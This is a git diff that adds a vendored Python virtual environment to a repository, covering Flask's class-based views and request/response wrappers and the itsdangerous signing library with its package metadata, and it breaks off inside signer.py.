#: + #: A single instance is more efficient, especially if complex setup + #: is done during init. However, storing data on ``self`` is no + #: longer safe across requests, and :data:`~flask.g` should be used + #: instead. + #: + #: .. versionadded:: 2.2 + init_every_request: t.ClassVar[bool] = True + + def dispatch_request(self) -> ft.ResponseReturnValue: + """The actual view function behavior. Subclasses must override + this and return a valid response. Any variables from the URL + rule are passed as keyword arguments. + """ + raise NotImplementedError() + + @classmethod + def as_view( + cls, name: str, *class_args: t.Any, **class_kwargs: t.Any + ) -> ft.RouteCallable: + """Convert the class into a view function that can be registered + for a route. + + By default, the generated view will create a new instance of the + view class for every request and call its + :meth:`dispatch_request` method. If the view class sets + :attr:`init_every_request` to ``False``, the same instance will + be used for every request. + + Except for ``name``, all other arguments passed to this method + are forwarded to the view class ``__init__`` method. + + .. versionchanged:: 2.2 + Added the ``init_every_request`` class attribute. + """ + if cls.init_every_request: + + def view(**kwargs: t.Any) -> ft.ResponseReturnValue: + self = view.view_class( # type: ignore[attr-defined] + *class_args, **class_kwargs + ) + return current_app.ensure_sync(self.dispatch_request)(**kwargs) + + else: + self = cls(*class_args, **class_kwargs) + + def view(**kwargs: t.Any) -> ft.ResponseReturnValue: + return current_app.ensure_sync(self.dispatch_request)(**kwargs) + + if cls.decorators: + view.__name__ = name + view.__module__ = cls.__module__ + for decorator in cls.decorators: + view = decorator(view) + + # We attach the view class to the view function for two reasons: + # first of all it allows us to easily figure out what class-based + # view this thing came from, secondly it's also used for instantiating + # the view class so you can actually replace it with something else + # for testing purposes and debugging. + view.view_class = cls # type: ignore + view.__name__ = name + view.__doc__ = cls.__doc__ + view.__module__ = cls.__module__ + view.methods = cls.methods # type: ignore + view.provide_automatic_options = cls.provide_automatic_options # type: ignore + return view + + +class MethodView(View): + """Dispatches request methods to the corresponding instance methods. + For example, if you implement a ``get`` method, it will be used to + handle ``GET`` requests. + + This can be useful for defining a REST API. + + :attr:`methods` is automatically set based on the methods defined on + the class. + + See :doc:`views` for a detailed guide. + + .. code-block:: python + + class CounterAPI(MethodView): + def get(self): + return str(session.get("counter", 0)) + + def post(self): + session["counter"] = session.get("counter", 0) + 1 + return redirect(url_for("counter")) + + app.add_url_rule( + "/counter", view_func=CounterAPI.as_view("counter") + ) + """ + + def __init_subclass__(cls, **kwargs: t.Any) -> None: + super().__init_subclass__(**kwargs) + + if "methods" not in cls.__dict__: + methods = set() + + for base in cls.__bases__: + if getattr(base, "methods", None): + methods.update(base.methods) # type: ignore[attr-defined] + + for key in http_method_funcs: + if hasattr(cls, key): + methods.add(key.upper()) + + if methods: + cls.methods = methods + + def dispatch_request(self, **kwargs: t.Any) -> ft.ResponseReturnValue: + meth = getattr(self, request.method.lower(), None) + + # If the request method is HEAD and we don't have a handler for it + # retry with GET. + if meth is None and request.method == "HEAD": + meth = getattr(self, "get", None) + + assert meth is not None, f"Unimplemented method {request.method!r}" + return current_app.ensure_sync(meth)(**kwargs) diff --git a/env/Lib/site-packages/flask/wrappers.py b/env/Lib/site-packages/flask/wrappers.py new file mode 100644 index 00000000..ef7aa38c --- /dev/null +++ b/env/Lib/site-packages/flask/wrappers.py @@ -0,0 +1,173 @@ +from __future__ import annotations + +import typing as t + +from werkzeug.exceptions import BadRequest +from werkzeug.wrappers import Request as RequestBase +from werkzeug.wrappers import Response as ResponseBase + +from . import json +from .globals import current_app +from .helpers import _split_blueprint_path + +if t.TYPE_CHECKING: # pragma: no cover + from werkzeug.routing import Rule + + +class Request(RequestBase): + """The request object used by default in Flask. Remembers the + matched endpoint and view arguments. + + It is what ends up as :class:`~flask.request`. If you want to replace + the request object used you can subclass this and set + :attr:`~flask.Flask.request_class` to your subclass. + + The request object is a :class:`~werkzeug.wrappers.Request` subclass and + provides all of the attributes Werkzeug defines plus a few Flask + specific ones. + """ + + json_module: t.Any = json + + #: The internal URL rule that matched the request. This can be + #: useful to inspect which methods are allowed for the URL from + #: a before/after handler (``request.url_rule.methods``) etc. + #: Though if the request's method was invalid for the URL rule, + #: the valid list is available in ``routing_exception.valid_methods`` + #: instead (an attribute of the Werkzeug exception + #: :exc:`~werkzeug.exceptions.MethodNotAllowed`) + #: because the request was never internally bound. + #: + #: .. versionadded:: 0.6 + url_rule: Rule | None = None + + #: A dict of view arguments that matched the request. If an exception + #: happened when matching, this will be ``None``. + view_args: dict[str, t.Any] | None = None + + #: If matching the URL failed, this is the exception that will be + #: raised / was raised as part of the request handling. This is + #: usually a :exc:`~werkzeug.exceptions.NotFound` exception or + #: something similar. + routing_exception: Exception | None = None + + @property + def max_content_length(self) -> int | None: # type: ignore + """Read-only view of the ``MAX_CONTENT_LENGTH`` config key.""" + if current_app: + return current_app.config["MAX_CONTENT_LENGTH"] + else: + return None + + @property + def endpoint(self) -> str | None: + """The endpoint that matched the request URL. + + This will be ``None`` if matching failed or has not been + performed yet. + + This in combination with :attr:`view_args` can be used to + reconstruct the same URL or a modified URL. + """ + if self.url_rule is not None: + return self.url_rule.endpoint + + return None + + @property + def blueprint(self) -> str | None: + """The registered name of the current blueprint. + + This will be ``None`` if the endpoint is not part of a + blueprint, or if URL matching failed or has not been performed + yet. + + This does not necessarily match the name the blueprint was + created with. It may have been nested, or registered with a + different name. + """ + endpoint = self.endpoint + + if endpoint is not None and "." in endpoint: + return endpoint.rpartition(".")[0] + + return None + + @property + def blueprints(self) -> list[str]: + """The registered names of the current blueprint upwards through + parent blueprints. + + This will be an empty list if there is no current blueprint, or + if URL matching failed. + + .. versionadded:: 2.0.1 + """ + name = self.blueprint + + if name is None: + return [] + + return _split_blueprint_path(name) + + def _load_form_data(self) -> None: + super()._load_form_data() + + # In debug mode we're replacing the files multidict with an ad-hoc + # subclass that raises a different error for key errors. + if ( + current_app + and current_app.debug + and self.mimetype != "multipart/form-data" + and not self.files + ): + from .debughelpers import attach_enctype_error_multidict + + attach_enctype_error_multidict(self) + + def on_json_loading_failed(self, e: ValueError | None) -> t.Any: + try: + return super().on_json_loading_failed(e) + except BadRequest as e: + if current_app and current_app.debug: + raise + + raise BadRequest() from e + + +class Response(ResponseBase): + """The response object that is used by default in Flask. Works like the + response object from Werkzeug but is set to have an HTML mimetype by + default. Quite often you don't have to create this object yourself because + :meth:`~flask.Flask.make_response` will take care of that for you. + + If you want to replace the response object used you can subclass this and + set :attr:`~flask.Flask.response_class` to your subclass. + + .. versionchanged:: 1.0 + JSON support is added to the response, like the request. This is useful + when testing to get the test client response data as JSON. + + .. versionchanged:: 1.0 + + Added :attr:`max_cookie_size`. + """ + + default_mimetype: str | None = "text/html" + + json_module = json + + autocorrect_location_header = False + + @property + def max_cookie_size(self) -> int: # type: ignore + """Read-only view of the :data:`MAX_COOKIE_SIZE` config key. + + See :attr:`~werkzeug.wrappers.Response.max_cookie_size` in + Werkzeug's docs. + """ + if current_app: + return current_app.config["MAX_COOKIE_SIZE"] + + # return Werkzeug's default when not in an app context + return super().max_cookie_size diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/INSTALLER b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/LICENSE.rst b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/LICENSE.rst new file mode 100644 index 00000000..7b190ca6 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2011 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/METADATA b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/METADATA new file mode 100644 index 00000000..1d935ed3 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/METADATA @@ -0,0 +1,97 @@ +Metadata-Version: 2.1 +Name: itsdangerous +Version: 2.1.2 +Summary: Safely pass data to untrusted environments and back. +Home-page: https://palletsprojects.com/p/itsdangerous/ +Author: Armin Ronacher +Author-email: armin.ronacher@active-4.com +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://itsdangerous.palletsprojects.com/ +Project-URL: Changes, https://itsdangerous.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/itsdangerous/ +Project-URL: Issue Tracker, https://github.com/pallets/itsdangerous/issues/ +Project-URL: Twitter, https://twitter.com/PalletsTeam +Project-URL: Chat, https://discord.gg/pallets +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst + +ItsDangerous +============ + +... so better sign this + +Various helpers to pass data to untrusted environments and to get it +back safe and sound. Data is cryptographically signed to ensure that a +token has not been tampered with. + +It's possible to customize how data is serialized. Data is compressed as +needed. A timestamp can be added and verified automatically while +loading a token. + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + pip install -U itsdangerous + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +A Simple Example +---------------- + +Here's how you could generate a token for transmitting a user's id and +name between web requests. + +.. code-block:: python + + from itsdangerous import URLSafeSerializer + auth_s = URLSafeSerializer("secret key", "auth") + token = auth_s.dumps({"id": 5, "name": "itsdangerous"}) + + print(token) + # eyJpZCI6NSwibmFtZSI6Iml0c2Rhbmdlcm91cyJ9.6YP6T0BaO67XP--9UzTrmurXSmg + + data = auth_s.loads(token) + print(data["name"]) + # itsdangerous + + +Donate +------ + +The Pallets organization develops and supports ItsDangerous and other +popular packages. In order to grow the community of contributors and +users, and allow the maintainers to devote more time to the projects, +`please donate today`_. + +.. _please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://itsdangerous.palletsprojects.com/ +- Changes: https://itsdangerous.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/ItsDangerous/ +- Source Code: https://github.com/pallets/itsdangerous/ +- Issue Tracker: https://github.com/pallets/itsdangerous/issues/ +- Website: https://palletsprojects.com/p/itsdangerous/ +- Twitter: https://twitter.com/PalletsTeam +- Chat: https://discord.gg/pallets + + diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/RECORD b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/RECORD new file mode 100644 index 00000000..d3a279a7 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/RECORD @@ -0,0 +1,23 @@ +itsdangerous-2.1.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +itsdangerous-2.1.2.dist-info/LICENSE.rst,sha256=Y68JiRtr6K0aQlLtQ68PTvun_JSOIoNnvtfzxa4LCdc,1475 +itsdangerous-2.1.2.dist-info/METADATA,sha256=ThrHIJQ_6XlfbDMCAVe_hawT7IXiIxnTBIDrwxxtucQ,2928 +itsdangerous-2.1.2.dist-info/RECORD,, +itsdangerous-2.1.2.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +itsdangerous-2.1.2.dist-info/top_level.txt,sha256=gKN1OKLk81i7fbWWildJA88EQ9NhnGMSvZqhfz9ICjk,13 +itsdangerous/__init__.py,sha256=n4mkyjlIVn23pgsgCIw0MJKPdcHIetyeRpe5Fwsn8qg,876 +itsdangerous/__pycache__/__init__.cpython-310.pyc,, +itsdangerous/__pycache__/_json.cpython-310.pyc,, +itsdangerous/__pycache__/encoding.cpython-310.pyc,, +itsdangerous/__pycache__/exc.cpython-310.pyc,, +itsdangerous/__pycache__/serializer.cpython-310.pyc,, +itsdangerous/__pycache__/signer.cpython-310.pyc,, +itsdangerous/__pycache__/timed.cpython-310.pyc,, +itsdangerous/__pycache__/url_safe.cpython-310.pyc,, +itsdangerous/_json.py,sha256=wIhs_7-_XZolmyr-JvKNiy_LgAcfevYR0qhCVdlIhg8,450 +itsdangerous/encoding.py,sha256=pgh86snHC76dPLNCnPlrjR5SaYL_M8H-gWRiiLNbhCU,1419 +itsdangerous/exc.py,sha256=VFxmP2lMoSJFqxNMzWonqs35ROII4-fvCBfG0v1Tkbs,3206 +itsdangerous/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +itsdangerous/serializer.py,sha256=zgZ1-U705jHDpt62x_pmLJdryEKDNAbt5UkJtnkcCSw,11144 +itsdangerous/signer.py,sha256=QUH0iX0in-OTptMAXKU5zWMwmOCXn1fsDsubXiGdFN4,9367 +itsdangerous/timed.py,sha256=5CBWLds4Nm8-3bFVC8RxNzFjx6PSwjch8wuZ5cwcHFI,8174 +itsdangerous/url_safe.py,sha256=5bC4jSKOjWNRkWrFseifWVXUnHnPgwOLROjiOwb-eeo,2402 diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/WHEEL b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/top_level.txt b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/top_level.txt new file mode 100644 index 00000000..e163955e --- /dev/null +++ b/env/Lib/site-packages/itsdangerous-2.1.2.dist-info/top_level.txt @@ -0,0 +1 @@ +itsdangerous diff --git a/env/Lib/site-packages/itsdangerous/__init__.py b/env/Lib/site-packages/itsdangerous/__init__.py new file mode 100644 index 00000000..fdb2dfd0 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/__init__.py @@ -0,0 +1,19 @@ +from .encoding import base64_decode as base64_decode +from .encoding import base64_encode as base64_encode +from .encoding import want_bytes as want_bytes +from .exc import BadData as BadData +from .exc import BadHeader as BadHeader +from .exc import BadPayload as BadPayload +from .exc import BadSignature as BadSignature +from .exc import BadTimeSignature as BadTimeSignature +from .exc import SignatureExpired as SignatureExpired +from .serializer import Serializer as Serializer +from .signer import HMACAlgorithm as HMACAlgorithm +from .signer import NoneAlgorithm as NoneAlgorithm +from .signer import Signer as Signer +from .timed import TimedSerializer as TimedSerializer +from .timed import TimestampSigner as TimestampSigner +from .url_safe import URLSafeSerializer as URLSafeSerializer +from .url_safe import URLSafeTimedSerializer as URLSafeTimedSerializer + +__version__ = "2.1.2" diff --git a/env/Lib/site-packages/itsdangerous/_json.py b/env/Lib/site-packages/itsdangerous/_json.py new file mode 100644 index 00000000..c70d37a9 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/_json.py @@ -0,0 +1,16 @@ +import json as _json +import typing as _t + + +class _CompactJSON: + """Wrapper around json module that strips whitespace.""" + + @staticmethod + def loads(payload: _t.Union[str, bytes]) -> _t.Any: + return _json.loads(payload) + + @staticmethod + def dumps(obj: _t.Any, **kwargs: _t.Any) -> str: + kwargs.setdefault("ensure_ascii", False) + kwargs.setdefault("separators", (",", ":")) + return _json.dumps(obj, **kwargs) diff --git a/env/Lib/site-packages/itsdangerous/encoding.py b/env/Lib/site-packages/itsdangerous/encoding.py new file mode 100644 index 00000000..edb04d1a --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/encoding.py @@ -0,0 +1,54 @@ +import base64 +import string +import struct +import typing as _t + +from .exc import BadData + +_t_str_bytes = _t.Union[str, bytes] + + +def want_bytes( + s: _t_str_bytes, encoding: str = "utf-8", errors: str = "strict" +) -> bytes: + if isinstance(s, str): + s = s.encode(encoding, errors) + + return s + + +def base64_encode(string: _t_str_bytes) -> bytes: + """Base64 encode a string of bytes or text. The resulting bytes are + safe to use in URLs. + """ + string = want_bytes(string) + return base64.urlsafe_b64encode(string).rstrip(b"=") + + +def base64_decode(string: _t_str_bytes) -> bytes: + """Base64 decode a URL-safe string of bytes or text. The result is + bytes. + """ + string = want_bytes(string, encoding="ascii", errors="ignore") + string += b"=" * (-len(string) % 4) + + try: + return base64.urlsafe_b64decode(string) + except (TypeError, ValueError) as e: + raise BadData("Invalid base64-encoded data") from e + + +# The alphabet used by base64.urlsafe_* +_base64_alphabet = f"{string.ascii_letters}{string.digits}-_=".encode("ascii") + +_int64_struct = struct.Struct(">Q") +_int_to_bytes = _int64_struct.pack +_bytes_to_int = _t.cast("_t.Callable[[bytes], _t.Tuple[int]]", _int64_struct.unpack) + + +def int_to_bytes(num: int) -> bytes: + return _int_to_bytes(num).lstrip(b"\x00") + + +def bytes_to_int(bytestr: bytes) -> int: + return _bytes_to_int(bytestr.rjust(8, b"\x00"))[0] diff --git a/env/Lib/site-packages/itsdangerous/exc.py b/env/Lib/site-packages/itsdangerous/exc.py new file mode 100644 index 00000000..c38a6af5 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/exc.py @@ -0,0 +1,107 @@ +import typing as _t +from datetime import datetime + +_t_opt_any = _t.Optional[_t.Any] +_t_opt_exc = _t.Optional[Exception] + + +class BadData(Exception): + """Raised if bad data of any sort was encountered. This is the base + for all exceptions that ItsDangerous defines. + + .. versionadded:: 0.15 + """ + + def __init__(self, message: str): + super().__init__(message) + self.message = message + + def __str__(self) -> str: + return self.message + + +class BadSignature(BadData): + """Raised if a signature does not match.""" + + def __init__(self, message: str, payload: _t_opt_any = None): + super().__init__(message) + + #: The payload that failed the signature test. In some + #: situations you might still want to inspect this, even if + #: you know it was tampered with. + #: + #: .. versionadded:: 0.14 + self.payload: _t_opt_any = payload + + +class BadTimeSignature(BadSignature): + """Raised if a time-based signature is invalid. This is a subclass + of :class:`BadSignature`. + """ + + def __init__( + self, + message: str, + payload: _t_opt_any = None, + date_signed: _t.Optional[datetime] = None, + ): + super().__init__(message, payload) + + #: If the signature expired this exposes the date of when the + #: signature was created. This can be helpful in order to + #: tell the user how long a link has been gone stale. + #: + #: .. versionchanged:: 2.0 + #: The datetime value is timezone-aware rather than naive. + #: + #: .. versionadded:: 0.14 + self.date_signed = date_signed + + +class SignatureExpired(BadTimeSignature): + """Raised if a signature timestamp is older than ``max_age``. This + is a subclass of :exc:`BadTimeSignature`. + """ + + +class BadHeader(BadSignature): + """Raised if a signed header is invalid in some form. This only + happens for serializers that have a header that goes with the + signature. + + .. versionadded:: 0.24 + """ + + def __init__( + self, + message: str, + payload: _t_opt_any = None, + header: _t_opt_any = None, + original_error: _t_opt_exc = None, + ): + super().__init__(message, payload) + + #: If the header is actually available but just malformed it + #: might be stored here. + self.header: _t_opt_any = header + + #: If available, the error that indicates why the payload was + #: not valid. This might be ``None``. + self.original_error: _t_opt_exc = original_error + + +class BadPayload(BadData): + """Raised if a payload is invalid. This could happen if the payload + is loaded despite an invalid signature, or if there is a mismatch + between the serializer and deserializer. The original exception + that occurred during loading is stored on as :attr:`original_error`. + + .. versionadded:: 0.15 + """ + + def __init__(self, message: str, original_error: _t_opt_exc = None): + super().__init__(message) + + #: If available, the error that indicates why the payload was + #: not valid. This might be ``None``. + self.original_error: _t_opt_exc = original_error diff --git a/env/Lib/site-packages/itsdangerous/py.typed b/env/Lib/site-packages/itsdangerous/py.typed new file mode 100644 index 00000000..e69de29b diff --git a/env/Lib/site-packages/itsdangerous/serializer.py b/env/Lib/site-packages/itsdangerous/serializer.py new file mode 100644 index 00000000..9f4a84a1 --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/serializer.py @@ -0,0 +1,295 @@ +import json +import typing as _t + +from .encoding import want_bytes +from .exc import BadPayload +from .exc import BadSignature +from .signer import _make_keys_list +from .signer import Signer + +_t_str_bytes = _t.Union[str, bytes] +_t_opt_str_bytes = _t.Optional[_t_str_bytes] +_t_kwargs = _t.Dict[str, _t.Any] +_t_opt_kwargs = _t.Optional[_t_kwargs] +_t_signer = _t.Type[Signer] +_t_fallbacks = _t.List[_t.Union[_t_kwargs, _t.Tuple[_t_signer, _t_kwargs], _t_signer]] +_t_load_unsafe = _t.Tuple[bool, _t.Any] +_t_secret_key = _t.Union[_t.Iterable[_t_str_bytes], _t_str_bytes] + + +def is_text_serializer(serializer: _t.Any) -> bool: + """Checks whether a serializer generates text or binary.""" + return isinstance(serializer.dumps({}), str) + + +class Serializer: + """A serializer wraps a :class:`~itsdangerous.signer.Signer` to + enable serializing and securely signing data other than bytes. It + can unsign to verify that the data hasn't been changed. + + The serializer provides :meth:`dumps` and :meth:`loads`, similar to + :mod:`json`, and by default uses :mod:`json` internally to serialize + the data to bytes. + + The secret key should be a random string of ``bytes`` and should not + be saved to code or version control. Different salts should be used + to distinguish signing in different contexts. See :doc:`/concepts` + for information about the security of the secret key and salt. + + :param secret_key: The secret key to sign and verify with. Can be a + list of keys, oldest to newest, to support key rotation. + :param salt: Extra key to combine with ``secret_key`` to distinguish + signatures in different contexts. + :param serializer: An object that provides ``dumps`` and ``loads`` + methods for serializing data to a string. Defaults to + :attr:`default_serializer`, which defaults to :mod:`json`. + :param serializer_kwargs: Keyword arguments to pass when calling + ``serializer.dumps``. + :param signer: A ``Signer`` class to instantiate when signing data. + Defaults to :attr:`default_signer`, which defaults to + :class:`~itsdangerous.signer.Signer`. + :param signer_kwargs: Keyword arguments to pass when instantiating + the ``Signer`` class. + :param fallback_signers: List of signer parameters to try when + unsigning with the default signer fails. Each item can be a dict + of ``signer_kwargs``, a ``Signer`` class, or a tuple of + ``(signer, signer_kwargs)``. Defaults to + :attr:`default_fallback_signers`. + + .. versionchanged:: 2.0 + Added support for key rotation by passing a list to + ``secret_key``. + + .. versionchanged:: 2.0 + Removed the default SHA-512 fallback signer from + ``default_fallback_signers``. + + .. versionchanged:: 1.1 + Added support for ``fallback_signers`` and configured a default + SHA-512 fallback. This fallback is for users who used the yanked + 1.0.0 release which defaulted to SHA-512. + + .. versionchanged:: 0.14 + The ``signer`` and ``signer_kwargs`` parameters were added to + the constructor. + """ + + #: The default serialization module to use to serialize data to a + #: string internally. The default is :mod:`json`, but can be changed + #: to any object that provides ``dumps`` and ``loads`` methods. + default_serializer: _t.Any = json + + #: The default ``Signer`` class to instantiate when signing data. + #: The default is :class:`itsdangerous.signer.Signer`. + default_signer: _t_signer = Signer + + #: The default fallback signers to try when unsigning fails. + default_fallback_signers: _t_fallbacks = [] + + def __init__( + self, + secret_key: _t_secret_key, + salt: _t_opt_str_bytes = b"itsdangerous", + serializer: _t.Any = None, + serializer_kwargs: _t_opt_kwargs = None, + signer: _t.Optional[_t_signer] = None, + signer_kwargs: _t_opt_kwargs = None, + fallback_signers: _t.Optional[_t_fallbacks] = None, + ): + #: The list of secret keys to try for verifying signatures, from + #: oldest to newest. The newest (last) key is used for signing. + #: + #: This allows a key rotation system to keep a list of allowed + #: keys and remove expired ones. + self.secret_keys: _t.List[bytes] = _make_keys_list(secret_key) + + if salt is not None: + salt = want_bytes(salt) + # if salt is None then the signer's default is used + + self.salt = salt + + if serializer is None: + serializer = self.default_serializer + + self.serializer: _t.Any = serializer + self.is_text_serializer: bool = is_text_serializer(serializer) + + if signer is None: + signer = self.default_signer + + self.signer: _t_signer = signer + self.signer_kwargs: _t_kwargs = signer_kwargs or {} + + if fallback_signers is None: + fallback_signers = list(self.default_fallback_signers or ()) + + self.fallback_signers: _t_fallbacks = fallback_signers + self.serializer_kwargs: _t_kwargs = serializer_kwargs or {} + + @property + def secret_key(self) -> bytes: + """The newest (last) entry in the :attr:`secret_keys` list. This + is for compatibility from before key rotation support was added. + """ + return self.secret_keys[-1] + + def load_payload( + self, payload: bytes, serializer: _t.Optional[_t.Any] = None + ) -> _t.Any: + """Loads the encoded object. This function raises + :class:`.BadPayload` if the payload is not valid. The + ``serializer`` parameter can be used to override the serializer + stored on the class. The encoded ``payload`` should always be + bytes. + """ + if serializer is None: + serializer = self.serializer + is_text = self.is_text_serializer + else: + is_text = is_text_serializer(serializer) + + try: + if is_text: + return serializer.loads(payload.decode("utf-8")) + + return serializer.loads(payload) + except Exception as e: + raise BadPayload( + "Could not load the payload because an exception" + " occurred on unserializing the data.", + original_error=e, + ) from e + + def dump_payload(self, obj: _t.Any) -> bytes: + """Dumps the encoded object. The return value is always bytes. + If the internal serializer returns text, the value will be + encoded as UTF-8. + """ + return want_bytes(self.serializer.dumps(obj, **self.serializer_kwargs)) + + def make_signer(self, salt: _t_opt_str_bytes = None) -> Signer: + """Creates a new instance of the signer to be used. The default + implementation uses the :class:`.Signer` base class. + """ + if salt is None: + salt = self.salt + + return self.signer(self.secret_keys, salt=salt, **self.signer_kwargs) + + def iter_unsigners(self, salt: _t_opt_str_bytes = None) -> _t.Iterator[Signer]: + """Iterates over all signers to be tried for unsigning. Starts + with the configured signer, then constructs each signer + specified in ``fallback_signers``. + """ + if salt is None: + salt = self.salt + + yield self.make_signer(salt) + + for fallback in self.fallback_signers: + if isinstance(fallback, dict): + kwargs = fallback + fallback = self.signer + elif isinstance(fallback, tuple): + fallback, kwargs = fallback + else: + kwargs = self.signer_kwargs + + for secret_key in self.secret_keys: + yield fallback(secret_key, salt=salt, **kwargs) + + def dumps(self, obj: _t.Any, salt: _t_opt_str_bytes = None) -> _t_str_bytes: + """Returns a signed string serialized with the internal + serializer. The return value can be either a byte or unicode + string depending on the format of the internal serializer. + """ + payload = want_bytes(self.dump_payload(obj)) + rv = self.make_signer(salt).sign(payload) + + if self.is_text_serializer: + return rv.decode("utf-8") + + return rv + + def dump(self, obj: _t.Any, f: _t.IO, salt: _t_opt_str_bytes = None) -> None: + """Like :meth:`dumps` but dumps into a file. The file handle has + to be compatible with what the internal serializer expects. + """ + f.write(self.dumps(obj, salt)) + + def loads( + self, s: _t_str_bytes, salt: _t_opt_str_bytes = None, **kwargs: _t.Any + ) -> _t.Any: + """Reverse of :meth:`dumps`. Raises :exc:`.BadSignature` if the + signature validation fails. + """ + s = want_bytes(s) + last_exception = None + + for signer in self.iter_unsigners(salt): + try: + return self.load_payload(signer.unsign(s)) + except BadSignature as err: + last_exception = err + + raise _t.cast(BadSignature, last_exception) + + def load(self, f: _t.IO, salt: _t_opt_str_bytes = None) -> _t.Any: + """Like :meth:`loads` but loads from a file.""" + return self.loads(f.read(), salt) + + def loads_unsafe( + self, s: _t_str_bytes, salt: _t_opt_str_bytes = None + ) -> _t_load_unsafe: + """Like :meth:`loads` but without verifying the signature. This + is potentially very dangerous to use depending on how your + serializer works. The return value is ``(signature_valid, + payload)`` instead of just the payload. The first item will be a + boolean that indicates if the signature is valid. This function + never fails. + + Use it for debugging only and if you know that your serializer + module is not exploitable (for example, do not use it with a + pickle serializer). + + .. versionadded:: 0.15 + """ + return self._loads_unsafe_impl(s, salt) + + def _loads_unsafe_impl( + self, + s: _t_str_bytes, + salt: _t_opt_str_bytes, + load_kwargs: _t_opt_kwargs = None, + load_payload_kwargs: _t_opt_kwargs = None, + ) -> _t_load_unsafe: + """Low level helper function to implement :meth:`loads_unsafe` + in serializer subclasses. + """ + if load_kwargs is None: + load_kwargs = {} + + try: + return True, self.loads(s, salt=salt, **load_kwargs) + except BadSignature as e: + if e.payload is None: + return False, None + + if load_payload_kwargs is None: + load_payload_kwargs = {} + + try: + return ( + False, + self.load_payload(e.payload, **load_payload_kwargs), + ) + except BadPayload: + return False, None + + def load_unsafe(self, f: _t.IO, salt: _t_opt_str_bytes = None) -> _t_load_unsafe: + """Like :meth:`loads_unsafe` but loads from a file. + + .. versionadded:: 0.15 + """ + return self.loads_unsafe(f.read(), salt=salt) diff --git a/env/Lib/site-packages/itsdangerous/signer.py b/env/Lib/site-packages/itsdangerous/signer.py new file mode 100644 index 00000000..aa12005e --- /dev/null +++ b/env/Lib/site-packages/itsdangerous/signer.py @@ -0,0 +1,257 @@ +import hashlib +import hmac +import typing as _t + +from .encoding import _base64_alphabet +from .encoding import base64_decode +from .encoding import base64_encode +from .encoding import want_bytes +from .exc import BadSignature + +_t_str_bytes = _t.Union[str, bytes] +_t_opt_str_bytes = _t.Optional[_t_str_bytes] +_t_secret_key = _t.Union[_t.Iterable[_t_str_bytes], _t_str_bytes] + + +class SigningAlgorithm: + """Subclasses must implement 